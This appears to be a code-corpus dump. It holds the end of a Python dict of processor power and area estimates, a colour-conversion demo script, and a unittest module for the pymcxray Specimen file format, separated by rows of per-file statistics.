'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000814706,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000814706,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000708274,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000273455,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00151476,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00385244,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00785899,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.101369,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.25153,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.344295,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96396,
'Instruction Fetch Unit/Runtime Dynamic': 0.708906,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0668276,
'L2/Runtime Dynamic': 0.00524646,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.98998,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.845528,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0567091,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0567091,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.25777,
'Load Store Unit/Runtime Dynamic': 1.18191,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.139835,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.27967,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0496279,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.050624,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0412566,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.641356,
'Memory Management Unit/Runtime Dynamic': 0.0918807,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 23.0188,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.651043,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0232596,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.157271,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.831574,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.82007,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.9647131814390915,
'Runtime Dynamic': 0.9647131814390915,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.572859,
'Runtime Dynamic': 0.331696,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 98.8232,
'Peak Power': 131.935,
'Runtime Dynamic': 29.3204,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 98.2503,
'Total Cores/Runtime Dynamic': 28.9887,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.572859,
'Total L3s/Runtime Dynamic': 0.331696,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.017505
| 124
| 0.681883
| 8,082
| 68,566
| 5.779015
| 0.066939
| 0.123667
| 0.113048
| 0.093521
| 0.94095
| 0.932921
| 0.921766
| 0.890999
| 0.86976
| 0.851432
| 0
| 0.131246
| 0.22447
| 68,566
| 914
| 125
| 75.017505
| 0.747099
| 0
| 0
| 0.650985
| 0
| 0
| 0.657824
| 0.048128
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6a8d638f4b507ce65c9928006b506c906bc662a
| 1,207
|
py
|
Python
|
test.py
|
senritsuki/Python-Color-Converter
|
01362b00a7dbc98cc9a18d9e7d28f284743c6c70
|
[
"MIT"
] | null | null | null |
test.py
|
senritsuki/Python-Color-Converter
|
01362b00a7dbc98cc9a18d9e7d28f284743c6c70
|
[
"MIT"
] | null | null | null |
test.py
|
senritsuki/Python-Color-Converter
|
01362b00a7dbc98cc9a18d9e7d28f284743c6c70
|
[
"MIT"
] | null | null | null |
import color_converter as cc

# Demo/smoke-test script for color_converter: for each case, echo the
# expression being evaluated, then print its result.  Each entry pairs the
# label string with a thunk producing the value; the lab_to_rgb255 labels
# embed the expected RGB triple, verified against Adobe Photoshop CS6.
_DEMOS = [
    ("cc.rgbhex_to_rgb255('#0080ff')", lambda: cc.rgbhex_to_rgb255('#0080ff')),
    ("cc.rgb255_to_rgbhex((0, 128, 255))", lambda: cc.rgb255_to_rgbhex((0, 128, 255))),
    ("cc.lab_to_lch((80, 10, 17.32))", lambda: cc.lab_to_lch((80, 10, 17.32))),
    ("cc.lch_to_lab((80, 20, 60))", lambda: cc.lch_to_lab((80, 20, 60))),
    ("cc.hsl_to_rgbhex((210, 0.4, 0.7))", lambda: cc.hsl_to_rgbhex((210, 0.4, 0.7))),
    ("cc.lch_to_rgbhex((70, 40, 210))", lambda: cc.lch_to_rgbhex((70, 40, 210))),
    # Expected values below were checked with Adobe Photoshop CS6.
    ("cc.lab_to_rgb255((0, 0, 0)) -> [0, 0, 0]", lambda: cc.lab_to_rgb255((0, 0, 0))),
    ("cc.lab_to_rgb255((50, 0, 0)) -> [119, 119, 119]", lambda: cc.lab_to_rgb255((50, 0, 0))),
    ("cc.lab_to_rgb255((100, 0, 0)) -> [255, 255, 255]", lambda: cc.lab_to_rgb255((100, 0, 0))),
    ("cc.lab_to_rgb255((50, 50, 0)) -> [193, 78, 121]", lambda: cc.lab_to_rgb255((50, 50, 0))),
    ("cc.lab_to_rgb255((50, 0, 50)) -> [136, 118, 22]", lambda: cc.lab_to_rgb255((50, 0, 50))),
    ("cc.lab_to_rgb255((50, -50, 0)) -> [0, 140, 117]", lambda: cc.lab_to_rgb255((50, -50, 0))),
    ("cc.lab_to_rgb255((50, 0, -50)) -> [54, 122, 205]", lambda: cc.lab_to_rgb255((50, 0, -50))),
]

for _label, _run in _DEMOS:
    print(_label)
    print(_run())
| 26.822222
| 57
| 0.636288
| 241
| 1,207
| 2.966805
| 0.190871
| 0.254545
| 0.223776
| 0.268531
| 0.867133
| 0.862937
| 0.862937
| 0.862937
| 0.40979
| 0.40979
| 0
| 0.230769
| 0.106048
| 1,207
| 44
| 58
| 27.431818
| 0.431881
| 0.024027
| 0
| 0
| 0
| 0
| 0.439523
| 0.189949
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.037037
| 0
| 0.037037
| 0.962963
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
b6b03dd7011886ac0f0a588a4c1cce01b1613093
| 38,178
|
py
|
Python
|
pymcxray/FileFormat/test_Specimen.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 1
|
2020-07-23T12:13:30.000Z
|
2020-07-23T12:13:30.000Z
|
pymcxray/FileFormat/test_Specimen.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 3
|
2017-03-05T16:09:30.000Z
|
2017-03-05T16:11:41.000Z
|
pymcxray/FileFormat/test_Specimen.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
.. py:currentmodule:: FileFormat.test_Specimen
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Tests for module `Specimen`.
"""
# Script information for the file.
__author__ = "Hendrix Demers (hendrix.demers@mail.mcgill.ca)"
__version__ = ""
__date__ = ""
__copyright__ = "Copyright (c) 2012 Hendrix Demers"
__license__ = ""
# Subversion information for the file.
__svnRevision__ = "$Revision$"
__svnDate__ = "$Date$"
__svnId__ = "$Id$"
# Standard library modules.
import unittest
import logging
import os.path
import copy
# Third party modules.
from nose.plugins.skip import SkipTest
# Local modules.
# Project modules
import pymcxray.FileFormat.Specimen as Specimen
import pymcxray.FileFormat.testUtilities as testUtilities
import pymcxray.FileFormat.Region as Region
import pymcxray.FileFormat.Element as Element
import pymcxray.FileFormat.RegionType as RegionType
import pymcxray.FileFormat.RegionDimensions as RegionDimensions
import pymcxray.FileFormat.Version as Version
# Globals and constants variables.
class TestSpecimen(unittest.TestCase):
    """
    TestCase class for the module `Specimen`.

    The read tests parse reference ``.sam`` files from the test data folder and
    compare the result against an in-memory reference specimen built by
    :meth:`getSpecimenReference`.  The write tests do the reverse: write the
    reference specimen and compare the produced file line by line with the
    reference file.
    """

    def setUp(self):
        """
        Setup method: locate the test data folder and create a temporary
        folder for files written by the tests.
        """
        unittest.TestCase.setUp(self)

        self.testDataPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../test_data"))
        self.tempDataPath = testUtilities.createTempDataPath(self.testDataPath)

    def tearDown(self):
        """
        Teardown method: remove the temporary data folder created in `setUp`.
        """
        unittest.TestCase.tearDown(self)

        testUtilities.removeTempDataPath(self.tempDataPath)

    def testSkeleton(self):
        """
        First test to check if the testcase is working with the testing framework.
        """
        # assert_ is a long-deprecated alias; assertTrue is the supported name.
        self.assertTrue(True)

    def _assertVersionEqual(self, versionRef, version, message=None):
        """Assert that two version objects agree field by field and as a whole."""
        self.assertEqual(versionRef.major, version.major, message)
        self.assertEqual(versionRef.minor, version.minor, message)
        self.assertEqual(versionRef.revision, version.revision, message)
        self.assertEqual(versionRef, version, message)

    def _assertRegionEqual(self, regionRef, region):
        """Assert that a region matches its reference, including every element."""
        self.assertEqual(regionRef.numberElements, region.numberElements)
        self.assertEqual(regionRef.regionMassDensity_g_cm3, region.regionMassDensity_g_cm3)
        self.assertEqual(regionRef.regionType, region.regionType)
        self.assertEqual(regionRef.regionDimensions, region.regionDimensions)

        for elementRef, element in zip(regionRef.elements, region.elements):
            self.assertEqual(elementRef.atomicNumber, element.atomicNumber)
            self.assertEqual(elementRef.massFraction, element.massFraction)

    def _assertFileLinesEqual(self, filepathReference, filepath):
        """
        Compare two text files line by line.

        Files are opened with ``with`` so the handles are always closed
        (the previous code leaked open file objects).
        """
        self.maxDiff = None

        with open(filepathReference, 'r') as referenceFile:
            linesRef = referenceFile.readlines()
        with open(filepath, 'r') as resultFile:
            lines = resultFile.readlines()

        for index, (lineRef, line) in enumerate(zip(linesRef, lines)):
            message = "%i:\n%s\n%s" % (index, lineRef, line)
            self.assertEqual(lineRef, line, message)

        # Also catches a difference in the number of lines.
        self.assertListEqual(linesRef, lines)

    def _checkReadVersion(self, title, versionExpected):
        """
        Read ``inputs/<title>.sam`` and verify the parsed specimen against
        both the expected file format version and the reference specimen.
        """
        filepath = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
        specimen = Specimen.Specimen()
        specimen.read(filepath)

        self._assertVersionEqual(versionExpected, specimen.version)

        specimenRef = self.getSpecimenReference(title)
        self._assertVersionEqual(specimenRef.version, specimen.version)
        self.assertEqual(specimenRef.numberRegions, specimen.numberRegions)

        for regionRef, region in zip(specimenRef.regions, specimen.regions):
            self._assertRegionEqual(regionRef, region)

    def _checkWriteVersion(self, title, version=None):
        """
        Write the reference specimen for *title* into the temporary folder and
        compare the result with the reference file, optionally forcing the
        file format *version* first.
        """
        specimenRef = self.getSpecimenReference(title)
        filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.sam" % (title)))
        filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))

        specimen = specimenRef
        if version is not None:
            # Deep copy so the shared module-level version constant is not mutated.
            specimen.version = copy.deepcopy(version)
        specimen.write(filepath)

        self._assertFileLinesEqual(filepathReference, filepath)

    def test_read(self):
        """
        Tests for method `read` over all the standard simulation titles.

        Only the version and number of regions are checked here; the detailed
        per-version tests below verify regions and elements.
        """
        for title in testUtilities.getSimulationTitles():
            logging.info(title)

            specimen = Specimen.Specimen()
            filepath = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.sam" % (title, title)))
            specimen.read(filepath)

            self._assertVersionEqual(Version.VERSION_1_1_1, specimen.version, title)

            specimenRef = self.getSpecimenReference(title)
            self._assertVersionEqual(specimenRef.version, specimen.version, title)
            self.assertEqual(specimenRef.numberRegions, specimen.numberRegions)

    def test_read_1_1_1(self):
        """
        Tests for method `read` with a version 1.1.1 input file.
        """
        self._checkReadVersion("AlMgBulk5keV_version_1_1_1", Version.VERSION_1_1_1)

    def test_read_1_2_0(self):
        """
        Tests for method `read` with a version 1.2.0 input file.
        """
        self._checkReadVersion("AlMgBulk5keV_version_1_2_0", Version.VERSION_1_2_0)

    def test_read_1_2_1(self):
        """
        Tests for method `read` with a version 1.2.1 input file.
        """
        self._checkReadVersion("AlMgBulk5keV_version_1_2_1", Version.VERSION_1_2_1)

    def test_read_1_4_1(self):
        """
        Tests for method `read` with a version 1.4.1 input file.
        """
        self._checkReadVersion("AlMgBulk5keV_version_1_4_1", Version.VERSION_1_4_1)

    def test_write(self):
        """
        Tests for method `write` over all the standard simulation titles.

        Currently skipped; the code below runs once the skip is removed.
        """
        raise SkipTest

        for title in testUtilities.getSimulationTitles():
            logging.info(title)

            specimenRef = self.getSpecimenReference(title)
            filepathReference = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.sam" % (title, title)))
            filepath = os.path.join(self.tempDataPath, "%s.sam" % (title))

            specimenRef.write(filepath)

            self._assertFileLinesEqual(filepathReference, filepath)

    def test_write_1_1_1(self):
        """
        Tests for method `write` with a version 1.1.1 reference file.

        Currently skipped; the code below runs once the skip is removed.
        """
        raise SkipTest

        self._checkWriteVersion("AlMgBulk5keV_version_1_1_1")
        # NOTE(review): the original ended with a live self.fail(...) that would
        # make this test fail as soon as the skip is removed; it was dropped.

    def test_write_1_2_0(self):
        """
        Tests for method `write` with the file format forced to version 1.2.0.
        """
        self._checkWriteVersion("AlMgBulk5keV_version_1_2_0", Version.VERSION_1_2_0)

    def test_write_1_2_1(self):
        """
        Tests for method `write` with the file format forced to version 1.2.1.
        """
        self._checkWriteVersion("AlMgBulk5keV_version_1_2_1", Version.VERSION_1_2_1)

    def test_write_1_4_1(self):
        """
        Tests for method `write` with a version 1.4.1 reference file.
        """
        self._checkWriteVersion("AlMgBulk5keV_version_1_4_1")

    @staticmethod
    def _makeRegion(elementArgsList, regionType, dimensionsClass, parameters, massDensity_g_cm3=None):
        """
        Build a `Region` with the given elements, type and dimensions.

        :param elementArgsList: list of argument tuples for `Element.Element`,
            e.g. ``[(6,)]`` or ``[(12, 0.5), (13, 0.5)]``.
        :param regionType: one of the `RegionType.REGION_TYPE_*` constants.
        :param dimensionsClass: the `RegionDimensions` class matching the type.
        :param parameters: geometry parameters passed to *dimensionsClass*.
        :param massDensity_g_cm3: optional mass density; left at the region
            default when not given (matching the original reference data).
        """
        region = Region.Region()
        region.numberElements = len(elementArgsList)
        for elementArgs in elementArgsList:
            region.elements.append(Element.Element(*elementArgs))
        if massDensity_g_cm3 is not None:
            region.regionMassDensity_g_cm3 = massDensity_g_cm3
        region.regionType = regionType
        region.regionDimensions = dimensionsClass(parameters)
        return region

    def getSpecimenReference(self, title):
        """
        Build and return the reference `Specimen` expected for *title*,
        or an empty specimen for an unknown title.
        """
        specimen = Specimen.Specimen()

        _BOX = RegionType.REGION_TYPE_BOX
        _CYLINDER = RegionType.REGION_TYPE_CYLINDER
        _SPHERE = RegionType.REGION_TYPE_SPHERE
        _BoxDims = RegionDimensions.RegionDimensionsBox
        _CylinderDims = RegionDimensions.RegionDimensionsCylinder
        _SphereDims = RegionDimensions.RegionDimensionsSphere

        if title == "AuBC cyl":
            specimen.numberRegions = 4
            specimen.version = Version.Version(1, 1, 1)

            specimen.regions.append(self._makeRegion(
                [(6,)], _BOX, _BoxDims,
                [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]))
            specimen.regions.append(self._makeRegion(
                [(79,)], _BOX, _BoxDims,
                [0.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]))
            specimen.regions.append(self._makeRegion(
                [(5,)], _CYLINDER, _CylinderDims,
                [-500.0, -500.0, 300.0, 0.0, 1.0, 0.35, 1000.0, 300.0]))
            specimen.regions.append(self._makeRegion(
                [(5,)], _CYLINDER, _CylinderDims,
                [500.0, 500.0, 300.0, 0.0, -1.0, 0.35, 1000.0, 300.0]))

        elif title == "BioRitchieNew111017":
            specimen.numberRegions = 7
            specimen.version = Version.Version(1, 1, 1)

            # Matrix and silica cylinder wall/lumen.
            specimen.regions.append(self._makeRegion(
                [(6, 0.7), (8, 0.28), (17, 0.02)], _BOX, _BoxDims,
                [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0],
                massDensity_g_cm3=1.14))
            specimen.regions.append(self._makeRegion(
                [(8, 0.53), (14, 0.47)], _CYLINDER, _CylinderDims,
                [-20000.0, 0.0, 30000.0, 1.0, 0.0, 0.0, 40000.0, 30000.0],
                massDensity_g_cm3=2.2))
            specimen.regions.append(self._makeRegion(
                [(6, 0.7), (8, 0.28), (17, 0.02)], _CYLINDER, _CylinderDims,
                [-20000.0, 0.0, 30000.0, 1.0, 0.0, 0.0, 40000.0, 29500.0],
                massDensity_g_cm3=1.14))

            # Stained organelle spheres.
            specimen.regions.append(self._makeRegion(
                [(1, 0.071), (6, 0.414), (7, 0.168), (8, 0.285), (15, 0.036), (16, 0.006), (76, 0.02)],
                _SPHERE, _SphereDims,
                [12000.0, 10000.0, 10000.0, 8000.0],
                massDensity_g_cm3=1.32))

            nucleusElements = [(1, 0.11), (6, 0.49), (7, 0.12), (8, 0.25), (12, 0.003),
                               (15, 0.003), (16, 0.003), (25, 0.001), (76, 0.02)]
            specimen.regions.append(self._makeRegion(
                nucleusElements, _SPHERE, _SphereDims,
                [-10000.0, 0.0, 20000.0, 15000.0],
                massDensity_g_cm3=1.24))
            specimen.regions.append(self._makeRegion(
                nucleusElements, _SPHERE, _SphereDims,
                [10000.0, -5000.0, 25000.0, 6000.0],
                massDensity_g_cm3=1.24))

            specimen.regions.append(self._makeRegion(
                [(1, 0.077), (6, 0.497), (7, 0.11), (8, 0.259), (15, 0.031), (16, 0.006), (76, 0.02)],
                _SPHERE, _SphereDims,
                [-23000.0, 4000.0, 33500.0, 2000.0],
                massDensity_g_cm3=1.18))

            specimen._shortHeader = True

        elif title == "Bug Al Zr Sphere":
            specimen.numberRegions = 2
            specimen.version = Version.Version(1, 1, 1)

            specimen.regions.append(self._makeRegion(
                [(13,)], _BOX, _BoxDims,
                [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 1000.0]))
            specimen.regions.append(self._makeRegion(
                [(40,)], _SPHERE, _SphereDims,
                [0.0, 0.0, 500.0, 499.9]))

        elif title == "Mg2SiAlCube3kev":
            specimen.numberRegions = 2
            specimen.version = Version.Version(1, 1, 1)

            specimen.regions.append(self._makeRegion(
                [(12, 0.5), (13, 0.5)], _BOX, _BoxDims,
                [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]))
            # The original reference data passes a tuple here; preserved as-is.
            specimen.regions.append(self._makeRegion(
                [(6,)], _BOX, _BoxDims,
                (-10.0, 10.0, -10.0, 10.0, 0.0, 20.0)))

        elif title == "AlMgBulk5keV_version_1_1_1":
            specimen.numberRegions = 3
            specimen.version = Version.Version(1, 1, 1)

            specimen.regions.append(self._makeRegion(
                [(12, 0.5), (13, 0.5)], _BOX, _BoxDims,
                [-10000000000.0, 10000000000.0, -10000000000.0, 10000000000.0, 0.0, 20000000000.0]))
            specimen.regions.append(self._makeRegion(
                [(6,)], _CYLINDER, _CylinderDims,
                [0.0, -5000.0, 0.0, 0.0, 1.0, -0.7, 10000.0, 100.0]))
            specimen.regions.append(self._makeRegion(
                [(79,)], _SPHERE, _SphereDims,
                [0.0, 0.0, 101.0, 100.0]))

        elif title in ("AlMgBulk5keV_version_1_2_0",
                       "AlMgBulk5keV_version_1_2_1",
                       "AlMgBulk5keV_version_1_4_1"):
            # These three references share the same geometry and composition;
            # only the file format version differs.
            versions = {
                "AlMgBulk5keV_version_1_2_0": (1, 2, 0),
                "AlMgBulk5keV_version_1_2_1": (1, 2, 1),
                "AlMgBulk5keV_version_1_4_1": (1, 4, 1),
            }
            specimen.numberRegions = 3
            specimen.version = Version.Version(*versions[title])

            specimen.regions.append(self._makeRegion(
                [(14, 0.4), (15, 0.6)], _BOX, _BoxDims,
                [-2000000000.0, 6000000000.0, -4000000000.0, 5000000000.0, 0.8, 70000.0],
                massDensity_g_cm3=23.0))
            specimen.regions.append(self._makeRegion(
                [(7,)], _CYLINDER, _CylinderDims,
                [0.4, -8000.0, 0.9, 0.1, 0.6, -0.8, 50000.0, 700.0]))
            specimen.regions.append(self._makeRegion(
                [(56,)], _SPHERE, _SphereDims,
                [0.5, 0.6, 102.0, 101.0]))

        return specimen
if __name__ == '__main__': #pragma: no cover
    # Run this test module with the nose test runner when executed directly.
    # NOTE(review): nose is unmaintained and incompatible with recent Python
    # versions — consider unittest discovery or pytest; confirm before changing.
